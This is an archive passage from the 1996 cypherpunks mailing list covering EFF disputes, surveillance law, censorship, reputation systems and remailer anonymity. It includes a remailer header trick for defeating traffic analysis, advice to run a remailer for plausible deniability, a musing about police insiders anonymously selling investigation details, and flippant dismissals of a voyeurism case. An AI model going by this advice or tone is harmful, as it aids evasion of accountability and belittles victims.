ASEAN members encourage more self-regulation, and the > Philippines says freedom of speech is a critical factor. > "Political control would not be on the Philippines' agenda," Glenn > Sipin, deputy executive director of the Philippines Council for > Advanced Science and Technology, told Reuters at the start of the > conference. > Copyright © 1996 Nando.net From snow at smoke.suba.com Wed Sep 4 22:15:02 1996 From: snow at smoke.suba.com (snow) Date: Thu, 5 Sep 1996 13:15:02 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: On Wed, 4 Sep 1996, Black Unicorn wrote: > [This will be my last comment on this thread.] > On Tue, 3 Sep 1996, Vladimir Z. Nuri wrote: > > >I would put forth that you know nothing of my efforts, and therefore are > > infrantry will experience. if you expect unadulterated success, > > you're not living in the same reality everyone else around here > > is. > > If you're going to ask me for money and support, you damn well better > produce unadulterated success. I disagree with this. No one produces unadulterated sucess. Ever. You win some, you lose some. As long as you fight as hard as possible, and DO NOT COMPROMISE, then that is enough. Other than that, I concur. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From jgrasty at gate.net Wed Sep 4 22:18:53 1996 From: jgrasty at gate.net (Joey Grasty) Date: Thu, 5 Sep 1996 13:18:53 +0800 Subject: Message-ID: <199609050231.WAA36740@osceola.gate.net> Bugged: > Subject: How to send bogus mail to mislead traffic analysis? > > Hi > > How can I send messages to remailer so that they will get lost? > I want to generate a more or less steady flow of remailer-processed, encrypted mail. > > Can I send to nobody at some_remailer.net? > What are the guidelines for that? > What are the best remailers to send to? > > Cheers > > Bugged Set your final destination to "null:", e.g. ============================== :: Request-Remailing-To: null: This message gets trashed. ============================== This works for mixmaster remailers, WinSock Remailer, and probably most other cypherpunk remailers. Regards, -- Joey Grasty jgrasty at gate.net [home -- encryption, privacy, RKBA and other hopeless causes] jgrasty at pts.mot.com [work -- designing pagers] "Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin." -- John Von Neumann PGP = A7 CC 31 E4 7E A3 36 13 93 F4 C9 06 89 51 F5 A7 From andrew_loewenstern at il.us.swissbank.com Wed Sep 4 22:19:54 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Thu, 5 Sep 1996 13:19:54 +0800 Subject: How to send bogus mail to mislead traffic analysis? In-Reply-To: <19960904203437.2587.qmail@squirrel.owl.de> Message-ID: <9609050225.AA00649@ch1d157nwk> an anonymous squirrel wrote: > How can I send messages to remailer so that they will get > lost? I want to generate a more or less steady flow of > remailer-processed, encrypted mail. The single best way to generate a steady flow of encrypted remailer-processed mail for the purpose of disguising your own personal remail is to operate a publicly accessible remailer from your own account. This offers many advantages: 1. encrypted remail is (more or less, depending on traffic) constantly flowing from your account: the addition of your own remail traffic will not raise any more flags. 2. there is always at least one remailer in your chain you can trust: yours. This means you never have to worry about compromised remailers. 3. if your mailings are traced back to your account, operating a remailer gives you more 'plausible deniability' than if you weren't... 4. if remailers start charging for service, you not only would continue to enjoy free remailing, but you could possibly make money... 5. you aren't likely to get blacklisted from your own remailer... 6. you get to read the complaints generated by your own messages (is this the cyberspatial equivalent to "doing it just to see their expression" ......???) 7. you could get your picture on the front-page of a British tabloid... ...to name a few.... andrew From paul at fatmans.demon.co.uk Wed Sep 4 22:34:13 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Thu, 5 Sep 1996 13:34:13 +0800 Subject: desubscribe Message-ID: <841849147.2513.0@fatmans.demon.co.uk> > desubscribe I`m sorry I can`t allow that Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From declan at eff.org Wed Sep 4 22:49:50 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 5 Sep 1996 13:49:50 +0800 Subject: Digital Telephony and the Net In-Reply-To: <9609042054.AB16740@anchor.ho.att.com> Message-ID: It's late and I'm about to go home, but my search through the text of the Digital Telephony legislation comes up with the attached definitions the law uses. If I were, say, Jason "The Weasel" Baron (who's my fave DoJ attorney) and I wanted to really screw over some netizens, I might try to argue that an ISP should be a "telecommunications carrier." If the FCC bought my argument and thought that an ISP could in some cases substantially replace telephone service, then DT would apply to ISPs. Then ISPs must -- at the request of "authorized" Feds acting even without a warrant -- cough up all data coming to and from a person on their system. I'm probably wrong here and I hope I am, so I'm copying this to Marc who can point out the holes in my reasoning. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // (4) The term `electronic messaging services' means software-based services that enable the sharing of data, images, sound, writing, or other information among computing devices controlled by the senders or recipients of the messages. (6) The term `information services'-- (A) means the offering of a capability for generating, acquiring, storing, transforming, processing, retrieving, utilizing, or making available information via telecommunications; and (B) includes-- (i) a service that permits a customer to retrieve stored information from, or file information for storage in, information storage facilities; (ii) electronic publishing; and (iii) electronic messaging services; but (8) The term `telecommunications carrier'-- [...] (ii) a person or entity engaged in providing wire or electronic communication switching or transmission service to the extent that the Commission finds that such service is a replacement for a substantial portion of the local telephone exchange service and that it is in the public interest to deem such a person or entity to be a telecommunications carrier for purposes of this title; but (C) does not include-- (i) persons or entities insofar as they are engaged in providing information services; and (ii) any class or category of telecommunications carriers that the Commission exempts by rule after consultation with the Attorney General. SEC. 103. ASSISTANCE CAPABILITY REQUIREMENTS. (a) Capability Requirements: Except as provided in subsections (b), (c), and (d) of this section and sections 108(a) and 109(b) and (d), a telecommunications carrier shall ensure that its equipment, facilities, or services that provide a customer or subscriber with the ability to originate, terminate, or direct communications are capable of-- (1) expeditiously isolating and enabling the government, pursuant to a court order or other lawful authorization, to intercept, to the exclusion of any other communications, all wire and electronic communications carried by the carrier within a service area to or from equipment, facilities, or services of a subscriber of such carrier concurrently with their transmission to or from the subscriber's equipment, facility, or service, or at such later time as may be acceptable to the government; From deviant at pooh-corner.com Wed Sep 4 23:06:40 1996 From: deviant at pooh-corner.com (The Deviant) Date: Thu, 5 Sep 1996 14:06:40 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail In-Reply-To: Message-ID: On Wed, 4 Sep 1996, Declan McCullagh wrote: > He said the man was detected by two couples who noticed him moving his > foot under the skirt of a woman. They followed the man, held him and > called police. > > Police ask women who feel they've been victimized to call 808-5289. > > George Walter Campbell, 62, of Cornwall, has been charged with sexual > assault and mischief. He returns to College Park court on Sept. 10. > He was released on $750 cash bail yesterday. > Hrmm.. I can see how its _wrong_, but exactly how is looking under somebodies skirt _assault_? --Deviant "Obviously, a major malfunction has occurred." -- Steve Nesbitt, voice of Mission Control, January 28, 1986, as the shuttle Challenger exploded within view of the grandstands. From jfricker at vertexgroup.com Wed Sep 4 23:10:52 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Thu, 5 Sep 1996 14:10:52 +0800 Subject: Mail OnNet Message-ID: <2.2.32.19960905032606.0074c024@vertexgroup.com> At 09:06 AM 9/4/96 -0700, Alan Olsen wrote: >At 05:10 PM 8/31/96 -0700, Joel McNamara wrote: > >>Two notes. (1) It only runs under Win95 and NT. (2) It's ITAR restricted. > >(3) It is bigger than a battleship. The distribution is just shy of 10 >megs. Installed it is supposed to be about 45 megs. (In perspective, a >full install of Visual Basic 4.0 "Professional" is about 50 megs.) >--- The install is only 5MBs. Part of that 10MB package is a silly collection of netscape plugins which don't have to be installed. I guess they could be nice if I tried them. It also only works on NT4 regardless of what the web page says. With it's ability to run a program on receiving an email based upon filter criteria the possibilities are endless. (I know I know old hat for unix but so whiz bang for NTnoids like me.) --j From stewarts at ix.netcom.com Wed Sep 4 23:14:05 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 5 Sep 1996 14:14:05 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age Message-ID: <199609050327.UAA06817@dfw-ix8.ix.netcom.com> At 06:13 PM 9/2/96 -0400, you wrote: >> (This was done by many of us during the Karla Homulka and Teale trial in ... >There is a big difference between the Canada situation and the Singapore >situation. In Canada the restrictions are temporary and stem from making >the right to a fair trial a higher priority than the right to free >speech. >It is a conflict of two competing individual liberties. No observer of ..... >The situation in Sigapore is simply a corrupt government trying to >supress >legitimate democratic discussion. The intention is not to protect an >individuals right to a fair trial, the intention is to restrict argument >permanently. The Karla Homulka case and other criminal trials aren't the only censorship in Canada - there are far more serious problems. Zundel's problems (his legal ones, not just his moral ones) are well-known, as are the Dworkin/MacKinnon-inspired anti-pornography laws which Canada uses to censor lesbian bookstores and gay magazines. For the most part, other than sex and drugs, Canada's censorship is the pro-human-rights-politically-correct-liberal-hypocritical variety rather than the Singapore-style anti-human-rights-order-enforcing- politically-correct-dictatorship variety. But it's not only illegal to sell unapproved drugs in Canada, it's illegal to sell materials advocating drugs or their legalization, or of course information on how to make or grow drugs as well. (This helped Mark Emery get the capital to start his Hemp store in Vancouver by selling Cannabis magazines door-to-door :-) (It turns out that, since hemp seeds don't contain THC, they're not illegal in Canada, and hemp stores he's started or encouraged have sold enough seeds to grow more dope than Canada's police have confiscated in the last year or two. Mark openly violates the censorship laws, and his shop occasionally gets raided, and after the last bust they've decided he's a co-conspirator with everybody who's grown drugs using seeds or light bulbs bought from him, and they're playing a FUD game about whether to charge him with 8 life sentences, in under-5-year pieces....) Vancouver newspaper columnist Doug Collins gave a talk on censorship at an international libertarian conf. in BC recently, which Emery also spoke at. He knows the subject fairly well, since some of BC's censorship laws were written just for him. He's one of those anti-immigrant anti-Semitic* WW2-veteran curmudgeons who's got an editor who lets him write whatever he wants, and he offends a lot of people. In BC, and to some extent in the rest of Canada, you can be charged with human rights violations for disparaging ethnic and religious groups, and he's been tried and defended himself successfully for that, because Canada does have some limited protections for free speech in their Charter. So BC wrote a law that allows the BC human rights commission to fine people for human rights violations with just an administrative proceeding, not requiring a full-scale trial, and you generally can't get a jury in Canada for crimes with punishment less than 5 years in jail anyway. He hasn't been busted under the new law yet, but his publisher has spent about $30K in legal costs trying to make sure it doesn't happen. [*He knew better than to specifically say anything anti-Semitic while he was talking to us, but he referred to Jewish groups that oppose him in ways that implied he probably was.] And of course Canada has broadcasting licensing requirements that prevent people from starting radio and TV stations whenever they want to, plus a huge government broadcasting company, but they're not as limited as Singapore on that, and there are other countries with that problem. And of course they have silly language laws in Quebec, but they don't really limit what you can say as long as you say it in French (or Chinese or Vietnamese or just about anything except English and maybe Native languages.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From whgiii at amaranth.com Wed Sep 4 23:16:57 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Thu, 5 Sep 1996 14:16:57 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609042000.VAA00708@server.test.net> Message-ID: <199609050409.XAA28542@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <199609042000.VAA00708 at server.test.net>, on 09/04/96 at 09:00 PM, Adam Back said: >If this is the case she needs to be _much_ more careful about what she >says in `personal' interviews. There seems to be a point being missed in this thread. :( This was not a 'personal' interview. The paper was not interested in Ms. Dyson's views on anonymity on the internet because she seemed like a nice person. The only reason she was interviewed is because of her position with the EFF as chairwoman. Ms. Dyson knows this, the reporter knows this, the paper knows this, and so should everyone else. Under such circumstances this interview should be seen as an 'official' statement from the chairwoman of the EFF. Trying to call this a 'personal' interview and not reflecting 'official' EFF policy is just plain old spin-doctoring. Ms. Dyson should have had more common sense than this. These statements made by her are akin to the chairman of Philip Morris saying that he believe that cigarette smoke cause cancer but that's just his opinion and not the 'official' company position on it. Who would believe it? How long would he still have his job after making such a statement? The EFF should make an official statement of their position on this issue and if it is not the same as Ms. Dyson's she should be removed from the board. IMHO this is to important of an issue for the EFF to try to ignore. - -- - ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info - ----------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMi5aMo9Co1n+aLhhAQH+CwQAs/6nRK/jy2vUFIeWhmFIA0xCdf/m2Vgn SVyzMm6NTx8rVlJiluubkx3Au1t7/lb/KzzZJqt2ocbRUtc0XQUo0TQImqgY06/G 0OAiDYjgddGppUr+42yeHtWXUHK8vhYEgWeSfGS1msnYKchlcqZ16xzDmYVlfize ncf+FDLd+tE= =nOVA -----END PGP SIGNATURE----- From gsi at juno.com Wed Sep 4 23:24:36 1996 From: gsi at juno.com (Floyd W Odom) Date: Thu, 5 Sep 1996 14:24:36 +0800 Subject: GSI Message-ID: <19960904.200349.3230.3.GSI@juno.com> From: GSI Full-Name: Floyd W Odom To: Bugtraq Subject: GSI Message-ID: <19960904.195621.3230.0.GSI at juno.com> X-Status: Unsent X-Mailer: Juno 1.15 Dear Recipient, We at Galaxy Software would like to offer you a chance to buy software over the magic of e-mail. How it works is you can send us here at GSI(Galaxy Software Inc.) e-mail orders from our software list telling us that the check or money order is in the mail. To e-mail us just send a letter to GSI at JUNO.COM. For more information you can e-mail at: doom13 at juno.com.1. CGW Game Pack2. One must fall 2097 3. Decsent 24. CD Sampler: Volume Two5. Cannon Creative6. Animation Festival7. Duke Nukem 3D8. Doom9. World Atlas10. Crime City11. Airforce Combat12. GT Personel Accounting13. Wolfenstein 3D14. Print Master Gold15. Chaos16. Wizardry17. Corel 618. America Online 3.019. Power Chute Plus Demo20. UPC Doctor21. Epic Pinball: Enigma22. Epic Pinball: Android23. Epic Pinball: 1, 2, 324. Jazz Jackrabbit: Holiday Hare25. Jazz Jackrabbit: All* From gsi at juno.com Wed Sep 4 23:24:41 1996 From: gsi at juno.com (Floyd W Odom) Date: Thu, 5 Sep 1996 14:24:41 +0800 Subject: GSI Message-ID: <19960904.200214.3230.2.GSI@juno.com> From: GSI Full-Name: Floyd W Odom To: Bugtraq Subject: GSI Message-ID: <19960904.195621.3230.0.GSI at juno.com> X-Status: Unsent X-Mailer: Juno 1.15 Dear Recipient, We at Galaxy Software would like to offer you a chance to buy software over the magic of e-mail. How it works is you can send us here at GSI(Galaxy Software Inc.) e-mail orders from our software list telling us that the check or money order is in the mail. To e-mail us just send a letter to GSI at JUNO.COM. For more information you can e-mail at: doom13 at juno.com.1. CGW Game Pack2. One must fall 2097 3. Decsent 24. CD Sampler: Volume Two5. Cannon Creative6. Animation Festival7. Duke Nukem 3D8. Doom9. World Atlas10. Crime City11. Airforce Combat12. GT Personel Accounting13. Wolfenstein 3D14. Print Master Gold15. Chaos16. Wizardry17. Corel 618. America Online 3.019. Power Chute Plus Demo20. UPC Doctor21. Epic Pinball: Enigma22. Epic Pinball: Android23. Epic Pinball: 1, 2, 324. Jazz Jackrabbit: Holiday Hare25. Jazz Jackrabbit: All* From declan at well.com Wed Sep 4 23:38:49 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 5 Sep 1996 14:38:49 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail In-Reply-To: Message-ID: On Wed, 4 Sep 1996, The Deviant wrote: > > On Wed, 4 Sep 1996, Declan McCullagh wrote: > > He said the man was detected by two couples who noticed him moving his > > foot under the skirt of a woman. They followed the man, held him and > > called police. > > > > Police ask women who feel they've been victimized to call 808-5289. > > > > George Walter Campbell, 62, of Cornwall, has been charged with sexual > > assault and mischief. He returns to College Park court on Sept. 10. > > He was released on $750 cash bail yesterday. > > > > Hrmm.. I can see how its _wrong_, but exactly how is looking under > somebodies skirt _assault_? Why is this wrong? Information wants to be free! More to the point, boys used to put mirrors on their shoes. Now they learn about shoecams on the Net. Ah, to be young again. -Declan From tcmay at got.net Wed Sep 4 23:44:42 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 14:44:42 +0800 Subject: Reputations Message-ID: At 1:11 AM 9/5/96, Greg Burk wrote: >That part of the "reputation capital" theory has always seemed >suspicious to me. "reputation capital" doesn't behave linearly. There's >too much incentive to bottom-feed and too little incentive to shoot for >the heights. As an "asset", it is extremely non-liquid. It is hard to >spend it in a controlled manner. Sure, it isn't fungible, it isn't transitive, it isn't neat and clean. But it's the best thing we've got, imperfect as it is (and must be, I believe). >Too much incentive to bottom-feed: > >For example, let's say there's someone well-known who frequently speaks >nonsense on crypto issues. We'll call her "Norothy Nenning". She makes a >recommendation on some particular crypto issue, say "The government's >Nipper chip is a safe and effective form of crupto". Plenty of naive >people will credit her to some degree. True, fewer people than if she >had carefully husbanded her reputation, and to a lesser degree, but >still a lot more than zero. > >Notice that that's a zero cost/benefit ratio. She never does anything to >husband her reputation, she just spends it every chance she gets. And >while no single expenditure rewards her as much as it would if she made >the same expenditure with a good reputation, she spends so much more >freely that it is a good strategy for her on the whole. To stick with my restaurant example, consider _advertising_. MacDonald's and Burger King spend hundreds of millions of dollars every year claiming their "restaurants" are great. Many millions of people obviously are swayed. So? Others choose not to trust the advice of the MacDonald's hucksters. Maybe only a tiny fraction choose Chez Panisse over MacDonald's. This is the way of the world. It's still the give and take of reputations. It ain't perfect (in that it doesn't produce results I believe are empirically valid and optimum :-}). But it's all we have. It's the market. The agora. >"Reputation capital" is hard to spend down to absolute 0 because it is >significant work to distinguish valid "reputation capital" from >worthless counterfeit, and it is easy to counterfeit... just talk. I strongly disagree. It's quite possible for Person A to quickly convert his reputation to Person B to a _negative_ value. Real quick, in fact. Perhaps my short article did not fully explain a few things. Reputations are a _tensor_ or _matrix_ quantity. Person A has a reputation R(A,B) to Person B, a reputation R(A,C) to Person C, and so on. (And the matrix may be further broken down into reputations for advice on various subjects, in various fields, etc.) We may lump a lot of folks together and say, for example, that MacDonald's has a reputation of R (MacDonald's, lots of people) = 0.7531. And perhaps R (Chez Panisse, lots of people) = 0.0013 (i.e., they don't know what it is, and so value the rep of Chez Panisse at near zero). And so on. Lots of examples could be given. Now suppose that J. Anonymous Gourmand announces that MacDonald's is shit. How much will anonymous claim hurt MacDonald's? Obviously, not much. But what if the American Heart Association publishes a detailed study on the fat levels of MacDonald's products and declares it to "Dangerous." The effect will probably be greater, as R (AHA, many people) = high, and by the kind of Dempster-Shafer belief calculus I discussed a few months ago, the rep of the AHA propagates semi-transitively to the rep of MacDonald's. (This all happened recently, with the famous studies of fat levels of movie theater food...sales dropped almost overnight, and now the fat levels of popcorn, etc., have been changed for the better.) This is a real example of how reputations matter, how negative and positive reps matter, etc. Note especially that the "identity" (in the Dyson sense of providing True Name accountability) of an opinion-giver is not what it is important...it is not the essence of why people believe or don't believe the opinions of others. (Some years ago on the CBS station in San Francisco, there was an "anonymous gourmet" who visited restaurants and gave reviews. His reviews were taken quite seriously, and his anonymity did not matter, provided his personna was _persistent_. That is, provided that people thought it was "the guy they had come to trust," and not, say, a guy the station recruited off the street each day and sent out as the "anonymous gourmet." In the case of this guy, his face was cloaked in shadows, but his voice was distinctive. (His voice on the show was probably different from his food-ordering voice, so restaurants would not know who was ordering and alter the food or service.) Much could be written abou the role of anonymity in such reviews, in tests of service, etc.) >I anticipate the answer "Well, the work pays off". But that misses the >point. Frequently the work required to tell the good "reputation >capital" from the worthless is as much as would be required to find the >straight dope yourself. Reputations work OK for me in the real world. Given the limits on a lot of ontological facts, hard to see how it could be better. I've already spent too much time writing this, so I can't address the remainder of your points. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Wed Sep 4 23:49:09 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 14:49:09 +0800 Subject: Using Compromised Remailers to Get the Goods Message-ID: At 11:21 PM 9/4/96, jim bell wrote: >Perhaps the most ominous part of making "use of encryption to thwart an >investigation" illegal is _not_ that remailer operators might be prosecuted, >but that they might NOT be prosecuted in a deal where (in exchange for not >being prosecuted) they continue to operate the remailer, "cracked" or >sabotaged so that they share all the info with the cops. While even that >won't make chained remailers totally useless, eventually suspicions of such >a crack will surface, which will help sabotage the credibility of all >remailers, >not just the ones that have been "stung." A very valid concern. As Jim must be tired of hearing by now, this was brought up a couple of years ago in discussions about the pressure that could be brought to bear on remailers. One suggestion was a duress signal, effectively saying "I have been compromised." (Also known as a "wave off" in criminal circles.) The issue of whether a remailer can be trusted to wave off others, via covert channels, is of course another issue. One can hope that additional channels will be acquired to produce the necessary information. (For example, full sender untraceablility means that sources within police departments can go home, log on with the own PCs, and sell information about pending investigations, modulo their concerns about pointing to themselves with information provided (see "canary traps"). What an exciting world we are entering.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From cme at cybercash.com Wed Sep 4 23:57:23 1996 From: cme at cybercash.com (Carl Ellison) Date: Thu, 5 Sep 1996 14:57:23 +0800 Subject: ZD Net Registration Message-ID: <322E5ADD.124@cybercash.com> http://community.zdnet.com/register/register.cgi Check this out! Harvesting Mother's Maiden Name. I wonder how many they get each hour.... From shabbir at vtw.org Thu Sep 5 00:02:05 1996 From: shabbir at vtw.org (Voters Telecommunications Watch) Date: Thu, 5 Sep 1996 15:02:05 +0800 Subject: ALERT: Join thousands of net users in their fight against the White House! (9/4/96) Message-ID: <199609050413.AAA03766@panix3.panix.com> ============================================================================= ____ _ _ _ / ___|_ __ _ _ _ __ | |_ ___ | \ | | _____ _____ | | | '__| | | | '_ \| __/ _ \ _____| \| |/ _ \ \ /\ / / __| | |___| | | |_| | |_) | || (_) |_____| |\ | __/\ V V /\__ \ \____|_| \__, | .__/ \__\___/ |_| \_|\___| \_/\_/ |___/ |___/|_| NET LUMINARIES JOIN THOUSANDS IN SIGNING PRO-ENCRYPTION PETITION http://www.crypto.com/petition/ CRYPTO ACTION WEEK ENDS WITH JUDICIARY HEARING ON HR 3011 (9/11/96) Date: September 4, 1996 URL:http://www.crypto.com/ crypto-news at panix.com If you redistribute this, please do so in its entirety, with the banner intact. ----------------------------------------------------------------------------- Table of Contents Introduction Join Phil Zimmermann, Bruce Schneier, and other cyber luminaries! How to receive crypto-news Press contacts ----------------------------------------------------------------------------- INTRODUCTION This week is a hard week for many working on the encryption issue. The House pro-encryption bill, SAFE (HR 3011), will have a hearing in the Judiciary committee on September 11. Between now and then, individuals and industry representatives will be calling on their legislators to support HR 3011. On the other side of the issue, the White House is expected to release their "solution" to the encryption debate no earlier than September 8th. It will surprise no one if it is designed to be in the best interests of law enforcement with concerns for privacy placed dead last. Be a part of this assault on the White House by signing the pro-encryption petition at http://www.crypto.com/petition/ ----------------------------------------------------------------------------- JOIN PHIL ZIMMERMANN, BRUCE SCHNEIER, AND OTHER CYBER LUMINARIES! The following petition can be signed onto at http://www.crypto.com/petition/ The Information Revolution is being held hostage by an outdated, Cold War-era U.S. encryption policy. Current U.S. export controls and other initiatives are slowing the widespread availability of strong encryption products, endangering the privacy and security of electronic communications, harming the competitiveness of U.S. businesses, and threatening the future of electronic commerce and the growth of the Global Information Infrastructure (GII). We the undersigned Internet users and concerned citizens strongly support Congressional efforts to address this critical issue. Bills are currently pending in both Houses of Congress which would: -Relax export controls on encryption technology; -Prohibit the government from imposing "Key Escrow" solutions domestically; and -Recognize the importance of privacy and security for the future of electronic commerce, individual liberty, and the success of the Internet. We urge Congress to act NOW to enact a U.S. encryption policy that promotes electronic privacy and security. Join Phil Zimmerman, author of Pretty Good Privacy (PGP), Bruce Schneier, author of "Applied Cryptography", Dr. Matt Blaze of Tessera card fame, Phil Karn and Vince Cate as they pressure the White House to change their wrong-headed encryption policies. Add your name to theirs at http://www.crypto.com/petition/ ! ----------------------------------------------------------------------------- HOW TO RECEIVE CRYPTO-NEWS To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com) or send mail to majordomo at panix.com with "subscribe crypto-news" in the body of the message. To unsubscribe, send a letter to majordomo at panix.com with "unsubscribe crypto-news" in the body. ----------------------------------------------------------------------------- PRESS CONTACT INFORMATION Press inquiries on Crypto-News should be directed to Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir at vtw.org Jonah Seiger (CDT) at +1.202.637.9800 or jseiger at cdt.org ----------------------------------------------------------------------------- End crypto-news ============================================================================= From tcmay at got.net Thu Sep 5 00:12:11 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 15:12:11 +0800 Subject: Voluntary Disclosure of True Names Message-ID: In a rare moment of lucidity Vladimir Z. Dettweiler wrote: >I think cpunks should hold the view that communication is a matter >of mutual consent between sender and receiver. if a receiver says, >"I don't want any anonymous messages", then should be able to block them. But this is precisely what nearly all of us have been arguing. Namely, that the issue of anonymity vs. providing of True Names, is a matter of _contract_ between parties, not something the government is justified in sticking its nose into. Those who wish to not deal with the entities they cannot reliably verify the True Name of are free to filter them out. All we are asking is that those of us happy to deal with S. Boxx, Black Unicorn, PrOduct Cypher, Pablo Escobar, and other pseudospoofing tentacles, not be told by a government that, for our own good, such communications are felonies. >the above is almost exactly what Dyson was saying, and I have been No, Dyson said "Therefore I would favor allowing anonymity -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap." This implies a role for government, and concomitant restrictions on related anonymity technologies, to provide traceability. So much for mutual agreement between sender and recipient. (I have nothing against senders and recipients agreeing to use the services of some third party in providing ultimate traceability. I'm not wild about the U.S. Government being this third party, paid for by tax money, but so long as it is not required, it's a minor concern to me. I surmise, though, that use of the U.S. Government as a third party would not be optional, in the schemes of Dyson, Denning, and others of that ilk.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From makof at alias.cyberpass.net Thu Sep 5 00:40:14 1996 From: makof at alias.cyberpass.net (makofi) Date: Thu, 5 Sep 1996 15:40:14 +0800 Subject: Steganography -- Tell Tale Signs? Message-ID: <199609050421.VAA21428@sirius.infonex.com> Hi there! I'd appreciate some help from you experts in steganography. 1) If I hide some PGP encrypted data in a gif, jpg or wav file will there be any tell tale signs to the naked eye of an expert? If yes, what are they? 2) Would it better to hide the data in a jpg with black and white image rather than a color one? 3) Are there any tools at the moment to expose (not crack) the hidden encrypted data? If none. are there tools in development? If this is off-topic please accept my apologies. and if necessary, please email replies to me directly. Thank you. Makofi From rwright at adnetsol.com Thu Sep 5 01:01:57 1996 From: rwright at adnetsol.com (Ross Wright) Date: Thu, 5 Sep 1996 16:01:57 +0800 Subject: Voluntary Disclosure of True Names Message-ID: <199609050545.WAA18030@adnetsol.adnetsol.com> On Or About: 4 Sep 96 at 21:48, Timothy C. May wrote: > In a rare moment of lucidity Vladimir Z. Dettweiler wrote: > > >I think cpunks should hold the view that communication is a matter > >of mutual consent between sender and receiver. if a receiver says, > >"I don't want any anonymous messages", then should be able to block them. > > But this is precisely what nearly all of us have been arguing. Namely, that > the issue of anonymity vs. providing of True Names, is a matter of > _contract_ between parties, not something the government is justified in > sticking its nose into. I always use my true name and am happy to spread it far and wide, but I have been doing some work for a GroupWare manufacturer. They have seen that even in a corporate environment where information sharing is practised and embraced, sometimes people want to make a comment and not take the heat for making that comment. This can provide some constructive input, so they have a anonymous comment feature built in. So you could say that it is absolutely necessary for the web to have that feature as well. > of some third party in providing ultimate traceability. I'm not wild about > the U.S. Government being this third party NO WAY, These guys are in my life enough already, and you can't trust them anyway!!!! Ross =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From tcmay at got.net Thu Sep 5 01:07:33 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 16:07:33 +0800 Subject: ZD Net Registration Message-ID: At 4:45 AM 9/5/96, Carl Ellison wrote: >http://community.zdnet.com/register/register.cgi > >Check this out! Harvesting Mother's Maiden Name. >I wonder how many they get each hour.... "Think of it as evolution in action." I tried to register as "foobar," but the name was taken. So I added a few bits. I used "fuckyou" as my mother's maiden name (no pun intended). So now I'm an full-fledged member of ZD Net, fuck you very much. The more things change... --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From nobody at replay.com Thu Sep 5 01:10:03 1996 From: nobody at replay.com 